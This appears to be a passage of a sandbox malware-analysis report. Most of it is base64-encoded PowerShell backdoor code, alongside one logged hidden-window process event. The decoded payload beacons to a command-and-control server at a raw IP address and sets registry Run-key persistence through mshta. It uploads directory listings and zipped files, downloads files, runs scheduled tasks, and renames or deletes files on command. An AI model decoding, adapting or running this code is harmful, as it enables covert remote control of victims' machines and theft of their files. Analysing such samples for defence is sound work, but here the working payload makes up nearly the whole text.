eQB0AGUAcwAoACcAbwBrACcAKQApADsAVQBsAFUAbQBMACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAFgAVABsAGwAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAHQAYQBzAGsAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANQApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADUAKQB7ACQAQQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADQAXQA7ACQAUwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAOwAkAHQAcgBpAGcAZwBlAHIAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAE8AbgBjAGUAIAAtAEEAdAAgACgARwBlAHQALQBEAGEAdABlACkAIAAtAFIAZQBwAGUAdABpAHQAaQBvAG4ASQBuAHQAZQByAHYAYQBsACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAE0AaQBuAHUAdABlAHMAIAAxADAAKQA7ACQAVABhAHMAawAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAJABBAGMAdABpAG8AbgAgAC0AVAByAGkAZwBnAGUAcgAgACQAVAByAGkAZwBnAGUAcgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABTAGUAdAB0AGkAbgBnAHMAOwBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdACAALQBUAGEAcwBrAFAAYQB0AGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAFQAYQBzAGsAOwAkAFgAVABsAGwAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBVAGwAVQBtAEwAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAWABUAGwAbAA7AH0AfQBpAGYAIAAoACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAEMAbwBuAHQAYQBpAG4AcwAoACcAegBpAHAAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAwAF0AIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdADsAJABYAFQAbABsACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAVQBsAFUAbQBMACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAFgAVABsAGwAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAHIAZQBuAGEAbQBlADoAJwApACkAewAkAFEAQgBpAGEAPQAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBTAHUAYgBTAHQAcgBpAG4AZwAoADcAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQAUQBCAGkAYQAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAzACkAewBSAGUAbgBhAG0AZQAtAEkAdABlAG0AIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQA7ACQAWABUAGwAbAAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFUAbABVAG0ATAAgACQAWgBaAFMAWgBkAGIAdQBOAFIATwB1ACAAJABYAFQAbABsADsAfQB9AGkAZgAgACgAJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AQwBvAG4AdABhAGkAbgBzACgAJwBkAGUAbAA6ACcAKQApAHsAJABRAEIAaQBhAD0AJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA0ACkAOwBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABRAEIAaQBhACkAewBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAFEAQgBpAGEAOwAkAFgAVABsAGwAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBVAGwAVQBtAEwAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAWABUAGwAbAA7AH0AfQB9AH0AfQAgAEMAYQB0AGMAaAB7AH0AUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AdwBoAGkAbABlACgAJAB0AHIAdQBlACAALQBlAHEAIAAkAHQAcgB1AGUAKQA=

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Aug. 16, 2023, 2:57 p.m.	thread_identifier: 3052 thread_handle: 0x0000000000000370 process_identifier: 3048 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ep bypass -ec UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAOAA1ADsAJABPAGsAUwBEAEwAbABXAGMAVgBmAG4AcQBvAG8AIAA9ACAAMQAwADIANAAgACoAIAAxADAAMgA0ADsAJABvAHUAawBjAHYAVQBGAFAAaAAgAD0AIAAkAGUAbgB2ADoAQwBPAE0AUABVAFQARQBSAE4AQQBNAEUAIAArACAAJwAtACcAIAArACAAJABlAG4AdgA6AFUAUwBFAFIATgBBAE0ARQA7ACQAWgBaAFMAWgBkAGIAdQBOAFIATwB1ACAAPQAgACcAaAB0AHQAcAA6AC8ALwA3ADUALgAxADEAOQAuADEAMwA2AC4AMgAwADcALwBjAG8AbgBmAGkAZwAvAGIAYQBzAGUAcwAvAGMAbwBuAGYAaQBnAC4AcABoAHAAJwAgACsAIAAnAD8AVQA9ACcAIAArACAAJABvAHUAawBjAHYAVQBGAFAAaAA7ACQAeQB5AFUAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcAGcAWQBOAEMAcQBDAFEAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJAB5AHkAVQApACkAIAB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAgAC0ATgBhAG0AZQAgAG0ATwBUAEMASwBkACAALQBWAGEAbAB1AGUAIAAnAGMAOgBcAHcAaQBuAGQAbwB3AHMAXABzAHkAcwB0AGUAbQAzADIAXABjAG0AZAAuAGUAeABlACAALwBjACAAUABvAHcAZQByAFMAaABlAGwAbAAuAGUAeABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0ATgBvAEwAbwBnAG8AIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0AZQBwACAAYgB5AHAAYQBzAHMAIABwAGkAbgBnACAALQBuACAAMQAgAC0AdwAgADUANgAzADkANAAyACAAMgAuADIALgAyAC4AMgAgAHwAfAAgAG0AcwBoAHQAYQAgAGgAdAB0AHAAOgAvAC8ANwA1AC4AMQAxADkALgAxADMANgAuADIAMAA3AC8AYwBvAG4AZgBpAGcALwBiAGEAcwBlAHMALwAxAC4AaAB0AG0AbAAnACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUAOwB9AGYAdQBuAGMAdABpAG8AbgAgAFUAbABVAG0ATAAoACQAQwBzAEQAdAAsACAAJABXAFoAaABsAHYAbQBJAGQAbgApAHsAJABDAGYAcwBXAEkARQBuAE8ASQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAFcAWgBoAGwAdgBtAEkAZABuACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAbgBGAFoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACQAQwBzAEQAdAApADsAJABuAEYAWgAuAE0AZQB0AGgAbwBkACAAPQAgACcAUABPAFMAVAAnADsAJABuAEYAWgAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcAOwAkAG4ARgBaAC4AQwBvAG4AdABlAG4AdABMAGUAbgBnAHQAaAAgAD0AIAAkAEMAZgBzAFcASQBFAG4ATwBJAHIALgBMAGUAbgBnAHQAaAA7ACQAeQB5AFUAVQAgAD0AIAAkAG4ARgBaAC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkAOwAkAHkAeQBVAFUALgBXAHIAaQB0AGUAKAAkAEMAZgBzAFcASQBFAG4ATwBJAHIALAAgADAALAAgACQAQwBmAHMAVwBJAEUAbgBPAEkAcgAuAEwAZQBuAGcAdABoACkAOwAkAHkAeQBVAFUALgBGAGwAdQBzAGgAKAApADsAJAB5AHkAVQBVAC4AQwBsAG8AcwBlACgAKQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHMAcABvAG4AcwBlAF0AIAAkAEkATgBmAHEAZwAgAD0AIAAkAG4ARgBaAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUwBnAHUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAkAEkATgBmAHEAZwAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAKQA7ACQAeQB5AFUAVQBMAFQAIAA9ACAAJABTAGcAdQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AHIAZQB0AHUAcgBuACAAJAB5AHkAVQBVAEwAVAA7AH0AZgB1AG4AYwB0AGkAbwBuACAAQgBhAGkAVQBIAFUAUQBiAHoAUQBKAEEAcwAoACQAQwBzAEQAdAAsACAAJABmAHIAUgBZAG0AdwBiAHcALAAgACQAeABkAEgASwBEAHYARgBNACwAIAAkAEMATgBHAG4AdwBXACkAewAkAFQAaQBtAGUAbwB1AHQAPQAxADAAMAAwADAAMAAwADAAOwAkAEMAUgBMAEYAIAA9ACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMABEACkAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMABBACkAOwAkAFQAdwBvAEgAeQBwAGgAZQBuAHMAIAA9ACAAJwAtAC0AJwA7ACQAQgBvAHUAbgBkAGEAcgB5ACAAPQAgACcAKgAqACoAKgAqACcAOwAkAHMAdAByAGUAYQBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AE8AcABlAG4AUgBlAGEAZAAoACQAZgByAFIAWQBtAHcAYgB3ACkAOwAkAGcAQgBGAHYAUABnAGIAWgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAYgB5AHQAZQBbAF0AIAAkAE8AawBTAEQATABsAFcAYwBWAGYAbgBxAG8AbwA7AHcAaABpAGwAZQAoACAAJABiAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAZwBCAEYAdgBQAGcAYgBaACwAMAAsACQATwBrAFMARABMAGwAVwBjAFYAZgBuAHEAbwBvACkAKQB7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACAAJABuAEYAWgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJABDAHMARAB0ACkAOwAkAG4ARgBaAC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcAOwAkAG4ARgBaAC4AVABpAG0AZQBvAHUAdAAgAD0AIAAkAFQAaQBtAGUAbwB1AHQAOwAkAG4ARgBaAC4AQwBvAG4AdABlAG4AdABUAHkAcABlACAAPQAgACcAbQB1AGwAdABpAHAAYQByAHQALwBmAG8AcgBtAC0AZABhAHQAYQA7AGIAbwB1AG4AZABhAHIAeQA9ACcAIAArACAAJABCAG8AdQBuAGQAYQByAHkAOwAkAHkAeQBVAFUAIAA9ACAAJABuAEYAWgAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApADsAJABoAGUAYQBkAGkAbgBnADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwAxACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcAMQAuAEwAZQBuAGcAdABoACkAOwAkAGgAZQBhAGQAaQBuAGcAMgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBDAG8AbgB0AGUAbgB0AC0ARABpAHMAcABvAHMAaQB0AGkAbwBuADoAIABmAG8AcgBtAC0AZABhAHQAYQA7ACAAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJAB4AGQASABLAEQAdgBGAE0AIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJwA7AGYAaQBsAGUAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJABDAE4ARwBuAHcAVwAgACsAIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAyADIAKQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwAyACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcAMgAuAEwAZQBuAGcAdABoACkAOwAkAGgAZQBhAGQAaQBuAGcAMwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABDAFIATABGACkAOwAkAHkAeQBVAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJAB5AHkAVQBVAC4AVwByAGkAdABlACgAJABnAEIARgB2AFAAZwBiAFoALAAgADAALAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwAzACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcAMwAuAEwAZQBuAGcAdABoACkAOwAkAGgAZQBhAGQAaQBuAGcANAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABUAHcAbwBIAHkAcABoAGUAbgBzACAAKwAgACQAQgBvAHUAbgBkAGEAcgB5ACAAKwAgACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEMAUgBMAEYAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwA0ACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcANAAuAEwAZQBuAGcAdABoACkAOwAkAHkAeQBVAFUALgBGAGwAdQBzAGgAKAApADsAJAB5AHkAVQBVAC4AQwBsAG8AcwBlACgAKQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHMAcABvAG4AcwBlAF0AIAAkAEkATgBmAHEAZwAgAD0AIAAkAG4ARgBaAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUwBnAHUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAkAEkATgBmAHEAZwAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAKQA7ACQAeQB5AFUAVQBMAFQAIAA9ACAAJABTAGcAdQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0AJABzAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwB9AGYAdQBuAGMAdABpAG8AbgAgAHcAWQBsAGIAZABoAFUARgBEAGwAcgAoACQAQwBzAEQAdAAsACAAJABmAHIAUgBZAG0AdwBiAHcAKQB7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACAAJABSAGUAcQB1AGUAcwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAEMAcwBEAHQAKQA7ACQAUgBlAHEAdQBlAHMAdAAuAHMAZQB0AF8AVABpAG0AZQBvAHUAdAAoADEANQAwADAAMAApADsAJABSAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABSAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQAUwBwAGwAaQB0AFMAaQB6AGUAIAA9ACAAMQAwADIANAA7ACQAQgB1AGYAZgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAQgB5AHQAZQBbAF0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABTAHAAbABpAHQAUwBpAHoAZQA7AFQAcgB5ACAAewBEAG8AIAB7ACQAQwBvAHUAbgB0ACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQgB1AGYAZgBlAHIALAAgADAALAAgACQAUwBwAGwAaQB0AFMAaQB6AGUAKQA7ACQAbwBmAGYAcwBlAHQAIAA9ACAAJABDAG8AdQBuAHQAIAAtACAAMQA7AEEAZABkAC0AQwBvAG4AdABlAG4AdAAgACQAZgByAFIAWQBtAHcAYgB3ACAAJABCAHUAZgBmAGUAcgBbADAALgAuACQAbwBmAGYAcwBlAHQAXQAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQgB5AHQAZQA7AH0AIABVAG4AdABpAGwAKAAkAEMAbwB1AG4AdAAgAC0AZQBxACAAMAApAH0AIABDAGEAdABjAGgAIAB7AH0AIABGAGkAbgBhAGwAbAB5ACAAewAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAuAEQAaQBzAHAAbwBzAGUAKAApADsAfQB9AGQAbwB7AFQAcgB5AHsAJABKAE4AZgAgAD0AIABVAGwAVQBtAEwAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACcAJwA7AEkAZgAgACgAJABKAE4AZgAgAC0AbgBlACAAJwBuAHUAbABsACcAIAAtAGEAbgBkACAAJABKAE4AZgAgAC0AbgBlACAAJwAnACkAewAkAEoATgBmAD0AJABKAE4AZgAuAFMAdQBiAFMAdAByAGkAbgBnACgAMQAsACAAJABKAE4AZgAuAEwAZQBuAGcAdABoACAALQAgADIAKQA7ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABKAE4AZgApACkAOwBpAGYAIAAoACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgApAHsAaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGYAaQBsAGUAaQBuAGYAbwA6ACcAKQApAHsAJABRAEIAaQBhAD0AJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA5ACkAOwBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABRAEIAaQBhACkAewAkAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAHkAeQBVACAAKwAgACcALgBjAHMAdgAnADsARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAUQBCAGkAYQAgAC0ARgBpAGwAdABlAHIAIAAqAC4AKgAgAC0AUgBlAGMAdQByAHMAZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAATgBhAG0AZQAsACAATABlAG4AZwB0AGgALAAgAEwAYQBzAHQAVwByAGkAdABlAFQAaQBtAGUALAAgAEYAdQBsAGwAbgBhAG0AZQAgAHwAIABFAHgAcABvAHIAdAAtAEMAcwB2ACAALQBQAGEAdABoACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAEYAbwByAGMAZQAgAC0ATgBvAFQAeQBwAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuACAALQBFAG4AYwBvAGQAaQBuAGcAIAB1AHQAZgA4ADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZgBpAGwAZQBpAG4AZgBvACcAOwBCAGEAaQBVAEgAVQBRAGIAegBRAEoAQQBzACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAEMAbwBuAHQAYQBpAG4AcwAoACcAZABpAHIAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAUQBCAGkAYQApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJAB5AHkAVQAgACsAIAAnAC4AegBpAHAAJwA7AEMAbwBtAHAAcgBlAHMAcwAtAEEAcgBjAGgAaQB2AGUAIAAkAFEAQgBpAGEAIAAkAGYAaQBsAGUAbgBhAG0AZQAgAC0ARgBvAHIAYwBlADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZABpAHIAJwA7AEIAYQBpAFUASABVAFEAYgB6AFEASgBBAHMAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAZgBpAGwAZQBuAGEAbQBlACAAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQA7AFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlADsAfQB9AGkAZgAgACgAJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AQwBvAG4AdABhAGkAbgBzACgAJwBmAGkAbABlADoAJwApACkAewAkAFEAQgBpAGEAPQAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAFEAQgBpAGEAKQB7ACQAYQB0AH